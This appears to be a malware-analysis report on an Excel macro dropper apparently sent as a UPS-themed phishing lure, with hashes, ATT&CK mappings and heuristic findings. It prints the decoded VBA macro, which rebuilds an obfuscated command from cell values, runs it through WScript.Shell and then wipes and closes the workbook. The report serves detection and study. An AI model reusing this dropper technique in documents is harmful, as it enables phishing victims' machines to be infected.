Xls.Dropper.Agent-7792261-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 86fc375a2fca3cad…

MALICIOUS

Office (OLE)

Size: 77.0 KB
Created: 2020-05-13 10:03:57
First seen: 2020-09-15
MD5: 53e79aef2353c5a8c774e4bf0e5813ca
SHA-1: 3d08d5db2b106c46b6208e0083addbdf23b20e3e
SHA-256: 86fc375a2fca3cad9cc84cef106ebde475def1edf7f0fb23f80a40eb8927a643
Risk score: 220

Malware Insights

Xls.Dropper.Agent-7792261-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The file is an OLE document containing VBA macros. The macros call CreateObject("WScript.Shell") to execute a command string that is assembled at run time from the worksheet's constant cells: each cell value is offset by one and converted to a character with Chr, so the command itself does not appear in the macro source. The decoded command likely downloads and executes a second-stage payload, as indicated by the ClamAV detection name 'Xls.Dropper.Agent-7792261-0'. The string 'United Parcel Service' in the document body suggests a delivery-notification lure for phishing.

Heuristics (5)

  • ClamAV: Xls.Dropper.Agent-7792261-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-7792261-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • WScript.Shell usage (critical, OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched lines in script:
    a = ActiveSheet.UsedRange: i = 1
    For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
    chartO
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched lines in script:
    a = ActiveSheet.UsedRange: i = 1
    For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
    chartO
  • Reference to Windows Script Host (high, SC_STR_WSCRIPT)
    Reference to Windows Script Host

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1177 bytes
SHA-256: 827dbadb66d51cd503a6db2fa95d3a1cdb1ab00525c367279ff3d8023735f9e1

Preview of the extracted script:
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "dataview, 3, 0, MSForms, CommandButton"
Attribute VB_Control = "print3, 2, 1, MSForms, Frame"

Private Sub print3_Layout()
On Error Resume Next
a = ActiveSheet.UsedRange: i = 1
For Each px In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): textbbox = textbbox + Chr((px + i)): Next px: WScript.Quit = (CreateObject("WScript.Shell").Exec(textbbox).StdOut.ReadAll())
chartO
End Sub
Sub chartO()
Cells.Clear: With ActiveSheet: .Protect: End With: Application.Wait (Now + TimeValue("0:00:05"))
ActiveWorkbook.Close False
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True